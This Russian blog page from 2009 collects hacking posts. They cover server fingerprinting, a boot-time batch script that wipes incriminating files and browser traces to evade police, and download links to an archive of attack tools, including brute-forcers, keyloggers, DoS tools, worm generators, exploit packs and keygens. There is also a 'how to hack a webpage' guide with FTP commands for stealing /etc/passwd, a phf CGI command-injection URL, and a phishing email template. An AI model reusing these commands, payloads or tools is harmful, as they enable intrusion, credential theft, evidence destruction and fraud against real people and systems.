умолчанию, в качестве приглашения используется надпись типа "Добро пожаловать на сервер FreeBSD4.0 версия FTP клиента Х.ХХХ". Если ты такое увидел, то можно и радоваться и плакать, потому что это может быть и правдой. Если надпись приглашения отражает действительность, то админ - лох со стажем. Нормальный админ всегда изменяет приглашение по умолчанию. А вот хороший админ может написать и ложное сообщение. Например, на сервере с Windows 4.0 можно увидеть приглашение в Linux. В этом случае можно безуспешно потратить очень много времени в попытках сломать окна через дыры Linux. Поэтому не особо доверяй надписям и старайся перепроверить любыми другими способами. 3. Социальная инженерия. Если ты хочешь взломать сервант хостинговой компании, то можно отправить письмо админу с запросом об установленных у него серверах. В основном админы или служба поддержки не скрывают эту инфу, но бывают случаи и вранья. Возможно, что эта инфа будет лежать даже на главной странице сервера, но даже это следует проверить. Чтобы тебя не надули, обязательно обращай внимания на используемые на сервере сервисы, например, в Linux врят ли будут крутиться страницы созданные по технологии ASP. www.Download.hack : В этой врезке я постараюсь дать тебе список всех программ, которые тебе понадобятся при тестировании системы на дырявость. CyD NET Utils - всегда можно скачать с сайта www.cydsoft.com/vr-online. эта программа писалась не для взлома а для тестирования локальных сетей на работоспособность и безопасность. Так что если ты админ, то желательно иметь эту прогу в своем арсенале. В CyD NET Utils присутствует удобный сканер портов, пингер, WhoIs и многое другое. Результат работы можно всегда можно сохранить файл или распечатать. Shadow Scan (Сканеры) - отличная прога с большим количеством возможностей для тестирования системы на вшивость. Что-то говорит мне, что написана нашими братьями по разуму из ближней Украины. NT Crack (NT) - прога проверки NT на вшивость. Если ты хочешь взломать оконный сервер, то эта прога должна быть в твоем арсенале. Ну а если хочешь защитить NT, то тем более. NT Bugs (NT) - достаточно приличного размера описание багов оконного сервера. Если ты владеешь буржуйским языком, то просто обязан иметь ее в своем арсенале. LC4 (NT) - самый знаменитый и крутейший подборщик паролей для NT. Retina Network Security Scanner (http://www.eeye.com/) - хороший сканер безопасности. Вот не знаю я, и за что я в него такой влюбленный :)? Короткий словарик : Демон - серверная программа, которая работает в фоне и предназначена для выполнения каких-либо действий. Этот термин применяется в *nix средах. Там названия таких прог в основном отличаются тем, что в конце имени стоит буква "d". Представим себе демон WEB сервера. Это должна быть прога, которая висит в памяти и ждет подключения на 80-й порт (это по умолчанию). Как только кто-то подсоединился, демон начинает принимать запросы и отвечать на них. Но демоны бывают не только сетевые, потому к сетевым, например, невозможно отнести демон печати. Сервисы - это то же самое, что и демоны, только так называют те же проги в окошках. Експлоит - прога, которая умеет пользоваться какой-нибудь уязвимостью сервака. Если он написан под *nix, то может поставляться в исходных кодах. В этом случае, перед использованием потребуеться компиляция. Порт - Каждая сетевая программа при старте открывает для себя любой свободный порт. Есть и зарезервированные типа FTP это 21-й порт, HTTP это 80 порт и т. д. Теперь представим ситуацию, что на сервере запущено два сервиса: FTP и WEB. Это значит, что на сервере работает две программы, к которым можно коннектиться. Теперь ты хочешь присоединиться к FTP серверу и посылаешь запрос по адресу ХХХ.ХХХ.ХХХ.ХХХ и на порт 21. Сервер получает такой запрос и по номеру порта определяет, что твой запрос относиться именно к FTP серверу, а не WEB. Так что сетевые порты - это что-то виртуальное, что увидеть невозможно. Если бы не было портов, то комп не смог бы определить для кого именно пришел твой запрос. Троян - прога, которая незаметно сидит в системе жертвы и позволяет тебе управлять его компом

      http://www.xazkep.by.ru/stati/manual.htm

      Метки:  

      Боишься сотрудников ФСБ?

      Суббота, 04 Июля 2009 г. 22:20 + в цитатник
      Боишься сотрудников ФСБ?
      Автор: bustards, Просмотров: 498
      Если ты из тех, кому по ночам снятся сотрудники ФСБ, при виде милиционера ты начинаешь усиленно шифроваться или просто хочешь, чтоб твой винчестер без лишнего гимора был дотупен только тебе, эта статья как раз для тебя.
      Представь такую ситуацию, ты сидишь перед телеком, смотришь Санта Барбару и тут раздаётся звонок. Ты открываешь дверь и в квартиру входят несколько амбалов, представившись сотрудниками ФСБ =)Они просят тебя включить компьютер. Ты включаешь. Полазив пару минут по твоему винчестеру, они находят и твой любимый Sub7 с ОбманиСоседа, и Voidozer, и кучу ворованных даил апов.
      Затем заламывают тебе руку и везут в следственный изолятор. Как тебе? А ведь всё могло бы быть и подругому.
      Конечно, самым надёжным способом являются крипто алгоритмы. Но за надёжность нужно платить гимором и разного рода неудобствами. В этой статье я расскажу тебе о простеньком самодельном защитном устройстве для твеого компа от посягательств посторонних людей.
      Ладно, начнём.
      Прежде всего все компроментирующие тебя данные ты должен хранить в одном каталоге (я рассматриваю именно такой случай). Возможно присутствие неограниченного числа подкаталогов в нём.Далее cкопируй свой autoexec.bat в файл autoexec.bak (тоже в корень диска С). Теперь открой autoexec.bat блокнотом и добавь в конец строчку:
      load PCI Steering (PCIIRQHOLDER5)
      Не пугайся, она такая чудная, чтоб все подумали, что она чисто системная. Далее посмотри, есть ли в твоём autoexec'e cтрочка вроди:
      set PATH=список_папок
      Вместо "список_папок" там должна быть прописана папка с твоей виндой и ещё пара. Если такого вообще не наблюдается, добавь строчку:
      set PATH=%windir%command
      Всё, мы приготовились к внедрению самого механизма. Теерь cоздай в каталоге "c:windowscommand" файл load.bat. Его содержание должно быть таким:
      @echo off
      echo --- By windows setup ---
      @choice /c:za /N /T:a,5
      @if errorlevel 2 goto its_ok
      @deltree /y каталог_с_прогами_который_нужно_удалить
      @cls
      @deltree /y %windir%Tempor~1*.* > dead
      @deltree /y %windir%Tempor~1dead
      @cls
      @deltree /y %windir%History*.* > dead
      @deltree /y %windir%Historydead
      @cls
      @deltree /y %windir%Cookies*.txt > dead
      @deltree /y %windir%Cookiesdead
      @cls
      @deltree /y %windir%TEMP*.* > dead
      @deltree /y %windir%TEMPdead
      @cls
      @deltree /y c:autoexec.bat
      @cls
      @ren c:autoexec.bak autoexec.bat
      @deltree /y %windir%commandload.bat
      :its_ok
      Всё. Теперь перегружай комп и наслаждайся.
      Фишка вся в том, что при загрузке компа, как только ты увидишь на экране надпись "--- By windows setup ---" ты должен будешь нажать на кнопку "z". Если в течение пяти секунд ты на неё не нажмёшь, сотрётся каталог с твоими прогами и почистятся папки с временными инет файлами (типа логов). Как тебе? =) Тоесть ты один знаешь, как избежать этого дестроя. И самое главное, что сам дестрой будет проходить совершенно незаметно и по завершению оного данный механизм самоуничтожется. Тоесть никто и не узнает, что вообще что-то на твоём компе было (подредактированный autoexec.bat тоже заменяется на старый).
      Если тебя ломает при каждой загрузке нажимать на Z, можешь сделать так, чтобы наоборот при нажатии на кнопку происходил дестрой. Тоесть у тебя будет 5 сек, чтобы нажать на кнопку "А" (именно А, а не Z) для уничтожения компромата. Для этого замени 4ую строчку на "@choice /c:za /N /T:z,5
      "
      Если для тебя 5 сек это маломного, то просто подредактируй 3тью строчку cкрипта (замени там число 5 на более подходящее).

      Метки:  

      Пакет инструментов для взома

      Суббота, 04 Июля 2009 г. 10:07 + в цитатник
      Пакет инструментов для взома

      В пакете также имеются программы описания к каторым здесь нет.

      Cкачать пакет http://rapidshare.com/files/119660101/ULTRA_HACKERS.rar
      зеркало:
      http://depositfiles.com/files/5867587
      56.52 MB
      Описания:

      AddrView
      Описание: AddrView дает вам возможность анализировать HTML страницы и извлекать большинство адресов URL, находящихся в них. AddrView извлекает URL изображений (img - тег), ссылки на другие файлы (a - тег), CSS файлы, фреймы, Flash файлы и другие. Вы можете сохранять извлеченные списки адресов в текстовые файлы, HTML или XML файлы, или добавлять эти адреса в Избанное.

      AnonFTP
      Описание: This package contains /var/ftp area for anonymous FTP access.

      AppToService
      Описание: Программа дает возможность из командной строки запускать обычные приложения как сервис (службу).
      Впрочем, установить любое приложение в качестве сервиса можно совершенно бесплатно - достаточно всего лишь воспользоваться рекомендациями Windows XP FAQ.

      arpinject
      Описание:Любой компьютер в сети может просто взять, и послать пакет ARP_REPLAY. И тем самым внести изменения в ARP таблицу. Такая атака, носит название ARP Poisonig. Ее результат - перенаправление трафика, к требуемому хосту. Послать такой пакет(ы) можно программно, используя утилиту ARPInject.

      aspack21
      Описание:Очень неплохой упаковщик *.exe и *.dll файлов (в некоторых случаях степень сжатия достигает 70%). Кроме этого, программа хороша (особенно для программистов, пытающихся защитить свои шаровары) сложностью распаковки упакованного файла. Насколько я понимаю, сам ASPack упакован ASPACK'ом же :-) Неплохо и то, что программа дает возможность проверить перед окончательной упаковкой работу "предупакованного" exe-файла и, при нарушении его нормальной работы, отменить сжатие.
      В новой версии улучшилась скорость упаковки и добавлена опция "максимальная компрессия". В незарегистрированном виде программа работает 30 дней. Интерфейс многоязычный, в том числе и на русском языке.

      bios_pass_remover
      Описание: удаление пароля БИОС

      brutus
      Описание:Брутфорсер хз чего

      Cable Modem Sniffer
      Описание:Перехватчик трафика кабельного модема

      CapKeys_DIGITAL
      Описание:Key update einfach per internet.
      abspeichern als SofCam.key und als textdatei moglich.

      CGI Founder v1.043
      Описание:Прога для поиска дыр в CGI скриптах.

      CGISscan
      Описание:Сканер CGI скриптов

      cports
      Описание:Просмотр подключений и слушающих портов на компьютере

      craagle
      Описание:Программа для автоматизированного поиска всяческих серийнков и кейгенов по многим соответствующим архивам.

      CreditCardGjenerator
      Описание:Генератор кредов

      DDL Sites
      Описаниеirect Download Links

      DeepUnFreez
      Описание:"делает вычислительные окружающие среды легче управлять и обслуживать. Каждое переначало уничтожает все замены и перезагружает компьютер к его первоначальному состоянию, право вниз на последний байт"

      E-mail Cracker
      Описание:Восстановите забытые пароли почтового ящика, которые сохранены в клиенте электронной почты. Программа подражает серверу POP3, и пароль посылают назад пользователю. Это поддерживает клиента любой электронной почты POP3.

      ezDataBase_Defacer
      Описание:Дефэйсер движка ezDataBase

      FTP Brute Forcer
      Описание:Брутфорсер ФТП

      ftpbr
      Описание:Брутфорсер ФТП

      ~Censored~ Mail Bomber 2.3
      Описание:Бомер мыла

      G00B3RS_phpBB_exploit_pack
      Описание:Пак эксплоитов на двиг phpBB

      Google_Hacker_1.2
      Описание:Утилита помогающая с запросами из серии гуглхак

      grinder1.1
      Описание:Программа поможет найти указаный файл в заданом диапазоне IP-адрессов.

      HackersAssistant
      Описание:Пакет программ для хакера: Port Scanner, Ping Flooder,Server Slower,Connections,File Cleaner,Get Passwords,IP Validator,Web Browser,Ip Information,HTML Stealer,Site IP Retrieval,Winsock Scanner,exe Corruptor,Nuker,Hit Increaser,File Generator,Anonymous e-mail,Whois,Binary

      HackTheGame
      Описание: HackTheGame это игра-симулятор жизни хакера. В которой вы выступаете в роли хакера. Которому хз для чего и как надо ломать системы. Вступать в разборки с хак порталами, в общем, прожить долгую и весёлую жизнь. Главное не попасться бы мусорам.

      Hotmail Email Hacker
      Hotmail HAcker Gold
      Hotmail ScamPage
      HotmailHack
      Описание:По моему все равно какая то ересь давно не работающая, хотмыло не так просто взломать

      hydra-4.6-win
      Описание:THC-Hydra - распараллеленый взломщик паролей к различным сервисам (FTP, POP3, IMAP, Telnet, HTTP Auth, NNTP, VNC, ICQ, PCNFS, CISCO и др.) для UNIX платформ. С помощью этой утилиты вы можете атаковать несколько сервисов одновременно.

      iecv
      Описание:Internet Explorer Cookies View

      ipnetinfo
      Описание:Программа, которая показывает информацию об IP адресе. Она позволяет показывать расширенную информацию, касающуюся страны, владельца домена, диапазона выделяемых IP адресов, контактную информацию и многое другое. Эта утилита будет полезна, например, когда необходимо узнать происхождение почты, полученной от неизвестного адресата. Для этого вполне достаточно просто скопировать заголовки сообщения из почтовой программы в IPNetInfo. Она самостоятельно извлечет из текста все IP адреса и произведет необходимый поиск. Данное программное обеспечение использует несколько Whois серверов, тем самым, обеспечивая максимальную результативность поиска для конкретного сетевого адреса. Кроме всего прочего, она позволяет создавать HTML отчет, в котором хранится вся необходимая информация относительно выбранных IP адресов.

      john-17w
      Описание:взломщик паролей, в настоящее время доступный для UNIX, DOS, Win32. Его главная цель состоит в том, чтобы обнаружить слабые пароли UNIX. К программе можно приобрести коллекцию word листов более 600 Мб, с помощью которых значительно упрощается подбор паролей.

      Key Changer
      Описание:Коммерческая ($8.00) свободная от Троянов, программа предназначенная для поиска и смены ключа Продукта Windows XP, например пиратского на валидный (если таковой имеется). XP Key Changer после запуска, находит, меняет на предложенный ключ, а также имя и организацию зарегистрированные на представленной системе Windows XP. Программа XP Key Changer позволяет изменять Ключ Продукта XP и всю эту информацию, одним щелчком, на ВСЕХ машинах. Работает со всеми Сервис Паками, включая Windows XP SP3!

      Key_Logger
      Описание:кейлоггер Ж)

      Legion NetBios Scanner v2.1
      Описание:Сканер NEtBios ресурсов

      Mail Boomb_2.0 YAHOO
      Описание:Бомбер мыл яху

      MooreR Port Scanner
      Описание:Сканер портов на удаленной машине

      MSN Flooder 2.0
      Описание:Флудер мессенджера мсн

      NET BIOS Scaner
      Описание:Сканер NEtBios ресурсов

      NetBIOS Name Scanner
      Описание:Сканер NEtBios ресурсов

      NetResView
      Описание:Сканер NEtBios ресурсов

      NFO Maker 1.0
      Описание:Этот плагин служит для просмотра nfo и diz файлов, которые обычно находятся в скачанных архивах.
      Внимание: как сообщил автор, "К сожалению произошла досадная ошибка. Файл setting.reg добавлен в архив с плагином. Файл setting.reg отдельно можно скачать по ссылке http://issoft.narod.ru/downloads/setting.reg

      Nimda
      Описание:"Nimda" является Интернет-червем, распространяющимся по сети Интернет в виде вложенных файлов в сообщениях электронной почты, по ресурсам локальных сетей, а также проникающий на незащищенные IIS-серверы. Оригинальный файл-носитель червя имеет имя README.EXE и представляет собой программу формата Windows PE EXE, размером около 57 килобайт и написанную на языке программирования Microsoft C++.

      NTPacker
      Описание:Упаковщик файлов

      On-Off MSN
      Описание:Какая то включалка выключалка МСN

      P0kes WormGen 2.0
      Описание:генератор червей

      PCAnyPass
      Описание:PCAnywhere PassView просмотр паролей за звездочками

      Php Nuke Hacker v11.0
      Описание:Взломщик движка php nuke

      phpBB Annihilator
      phpbb attack
      phpbb bruteforcer
      PhpBB pass extractor
      phpBB_DoS
      phpbb_spammer
      phpBBAttacker
      phpBBcracker
      Описание:Набор утилит для взлома,спама,флуда,ддоса,брута phpBB

      PhpBuGScan
      Описание:Сканер багов в пхп скриптах

      Ping & Nukes
      Описание:пингер\ньюкер

      Listener XP
      Описание:Программа позволяет следить за каждым сетевым портом вашей системы, генерируя всплывающее окно при попытке доступа к этому порту. Программа пишет лог-файл IP-адресов подсоединяемых клиентов и отправляет вам запрос на разрешение его использования. Вы можете ввести номера портов по своему выбору или же программа сама предложит вам список по умолчанию. Программа запускается из системного трея.

      pqwak2
      Описание:Эта прога для подбора сетевых паролей.Достаточно быстро подбирает пароль на указанный диск в сети.

      procexp
      Описание:PROCEXP п казывает информацию, о процессах загрузки динамических библиотек и их свойствах.Это делает PROCEXP м щным инструментом для понимания внутреннего поведения приложений,также прослеживающего утечки информации маркера и DLL, несоответствий версий. И даже косвенное определение вирусов.

      ProxyPro
      Описание:Скан,пинг,переключение прокси

      rainbowcrack-1.2-src win-lin
      Описание:Программа позволяет создать базу предсгенерированных LanManager хешей, с помошью которой можно практически мгновенно взломать практически любой алфавитно-цифровой пароль.

      Remote Shut Down
      Описание:Удаленное выкючение машины

      ResHacker
      Описание:Коррекция exe и dll файлов. Многое можно в них поменять. С помощью этой программы можно запросто русифицировать программы.

      RpcScan101
      Описание:Сканер сетевых портов

      Sasser
      Описание:Вирус САССЕР внешне похож на измучивший миллионы пользователей интернета во всём мире летом 2003 года lovesan (blaster). Уже сейчас он имеет несколько своих модификаций, которые по словам специалистов ещё более вредоносные, чем оригинал. Так же по мнению экспертов этот вирус не несёт угрозы жёсткому диску компьютера, а лишь мешает пользоваться им полнофункционально. Его отличительные особенности - это появление сообщений о попытке соединения с ip адресом другого компьютера и сообщения об ошибке LSA Shell (Export version) и следующее за ним сообщение о необходимости перезагрузить компьютер из-за фатальной ошибки процесса lsass.exe

      SendMailer
      Описание:Отправляет письма в HTML формате и в любых кодировках без участия почтового клиента. Проверяет заполнение обязательных полей. Проверяет E-Mail на правильность (синтаксис). Переводит специальные символы в HTML формат. Дает возможность указать несколько адресов для выбора. Проверяет отправку и сообщает об ошибках. Возможность отправки копии отправителю. Очень легко настраивается. Также легко вставляется в любой дизайн. Дает полную возможность скрыть реальный адрес. При желании присылает информацию об обозревателе и IP адрес

      Server 2003 Keygen
      Описание:кейген для винды 2003 сервер

      Server Killer
      Описание:УбийцО серверов Ж)

      showpassv10
      Описание:открытие пароля за звездочкми

      sitedigger2
      Описание:Программа ищет в кеше гугля потенциальные уязвимости, ошибки, конфигурационные проблемы на Web сайтах. В новой версии в новой версии появилась возможность использования FSDB / GHDB и генерировать 10 результатов на каждую сигнатуру. Добавлено также большое количество новых сигнатур - open webcams, credit card numbers и др.

      SMBdie
      Описание:WinNuke возвращается! Представляем эксплоит, напрочь убивающий WinNT/2K/XP или .NET машины с Network Share Provider (работает на 139 и/или 445 порту). Использует неправильно сформированный SMB (Server Message Block) пакет, применяется анонимно, никакой учетной записи знать не требуется - для работы нужен только IP адрес и имя компьютера.

      SQLScan v1.0
      Описание:Утилита подбора пароля к Microsoft SQL серверу. Позволяет сканировать диапазон IP адресов. При подпоре пароля создает учетную NT запись с пустым паролем на уязвимой системе.

      Stealth - HTTP Scanner v1.0 build 23
      Описание:мощный инструмент ревизии защиты Web сервера, который просматривает более 19,000 уязвимостей.

      SuperScan4
      Описание:Сканер портов с кучей утилит. Также есть полезная утилита, которая вытаскивает из компа (windows) всю доступную инфу используя нулевую сессию.

      tftpd32.273
      Описание:небольшая freeware программа, включающая в себя простые в настройке DHCP, TFTP, SNTP и Syslog сервера, а также TFTP клиент

      traceroute
      Описание:Это служебная компьютерная программа, предназначенная для определения маршрутов следования данных в сетях TCP/IP.

      udpflood
      Описание:отправитель UDP пакетов. Инструмент затопляет UDP пакетами указанный IP и порт. Используется для тестирования устойчивости сетевых сервисов к UDP флуду. Пакеты могут задаваться пользователем или быть полностью случайными.

      Ultra Dos
      Описание:Программа для ДДОСа удаленной машины

      WebCracker 4.0
      Описание:Симпатичная программа для подбора паролей к сайтам.

      whoistd
      Описание:Утилитa, пoзвoляющaя пoлyчить инфopмaцию o зapeгиcтpиpoвaннoм дoмeнe (влaдeлeц и peгиcтpaциoнныe дaнныe). Aвтoмaтичecки cвязывaeтcя co cпpaвoчным cepвepoм Whois, oткyдa и пoлyчaeт инфopмaцию. Peзyльтaты мoгyт быть coxpaнeны в тeкcтoвыe фaйлы или в видe HTML-отчёта

      WindowHide
      Описание:Скрытие окон в трей и и с панели задач

      Win XP Activator
      Windows XP Corperate Keygen
      Windows XP KeyGen
      Windows XP Product Key Changer
      Windows XP Product Key Checker
      Windows XP Product Key Viewer
      Описание:Всякая лабуда для ХРюши

      wwwhack
      Описание:Утилита перебора, которая будет пробовать взломать Web сайты, охраняемые паролем Web доступа (HTTP Basic, HTTP Form, FTP, POP, и News).Эта утилита может использовать файл слов или пробовать все возможные комбинации и эмпирически будет пытаться находить комбинацию имени пользователя и пароля.

      xpass
      Описание:Простой и удобный Менеджер (+ Генератор) паролей.

      Yahoo Password
      yahooUltraCracker
      Описание:Яху восстанавливалки пароля

      Описания предоставил ® CrazyStudentS_Mi}{ за что ему спасибо!

      В пакете также имеются программы описания к каторым сдесь нет.

      http://rapidshare.com/files/119660101/ULTRA_HACKERS.rar
      зеркало:
      http://depositfiles.com/files/5867587
      56.52 MB

      Метки:  

      Как хакнуть страничку

      Четверг, 02 Июля 2009 г. 00:59 + в цитатник
      1. Получение информации
      Перед тем, как хакнуть Web-страничку, тебе следует иметь кое-какую информацию. Как получить ее? Сходи на http://www.Internic.com. Скажи им, что ты хочешь создать Web-страничку. Напиши имя той странички, которую ты хочешь хакнуть, в графе, где просит ввести имя странички, которую ты хочешь создать. Оно скажет, что типа, извините, кто-то уже использует этот домен и выдает информацию об этом. Это имя, адрес и E-Mail. Теперь ты знаешь, с кем будешь работать.


      2. Методы взлома. Есть несколько видов взлома.


      A) Взлом через FTP. Если ты в Windows зайди в эмуляцию DOS (Сделай это, когда законектишся на твой ISP) Теперь напиши в открытом Chepuha.com (Chepuha.com = введи место, которое ты хочешь хакнуть)
      После этого тебя спросят логин, нажми Enter
      После этого тебя спросят пароль, нажми Enter
      Потом напиши: quote user ftp
      Напиши: quote cwd ~root и надми Enter
      Напиши: quote pass ftp
      Теперь ты в системе, напиши: cd etc и нажми Enter
      Напиши: get passwd и если это не сработает, напиши get passwd.


      Б) Получить файл с паролями, это гораздо легче. Через TelNet на анонимных FTP серверах, посмотри директорию и найди файл, который называется Passwd. Затем используй Cracker Jack и расшифруй все пароли. Другой путь, получить пароли с помощью твоего браузера. Напиши: cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd после имени сервера. Например, имя может быть www.hackme.com, вот и напиши: http://www.hackme.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd Не уверен, что это сработает, но 10 сайтов из 100 будет работать это точно.


      В) Этот метод взлома использует GBoZ. Он называется "Scoial Engeneering", что это имеется в виду, долго рассказывать :). И так, ты получаешь информацию с Internic (пункт 1). Получив пользовательский E-Mail, запусти анонимную почтовую программу и IP снифер. В аноним-проге введи почтовый адрес жертвы и пошли ему его страничку, которую ты собираешься хакнуть. Тебе следует с имитировать письмо, как InternicHost.net. Скажи жертве в письме, типа такое: "Your webpage is casuing severe errors in our server change your password to "WXZPP3" immidately thanks". СОБЛЮДАЙ ГРАММАТИКУ И ПУНКТУАЦИЮ, ЧТОБЫ ПИСЬМО ВЫГЛЯДЕЛО, КАК ОФИЦИАЛЬНОЕ!


      Г) Если ты запустишь Linux или Unix, просто пропингуй выход Hackme.com (Hackme.com = место, которое ты хочешь хакнуть!)


      Ok, это все долго и нудно, но я надеюсь, что это придаст желаемых результатов!

      Про взлом

      Четверг, 02 Июля 2009 г. 00:34 + в цитатник

      aab7210d64e79cd993f107d4e349e3a8

      счетчик посетителей сайта

      russian bridesBeautiful, pretty and sexy single women

      [Этот ролик находится на заблокированном домене]



      Метки:  

      Поиск сообщений в Gafarov-91
      Страницы: 22 ..
      .. 3 2 [1] Календарь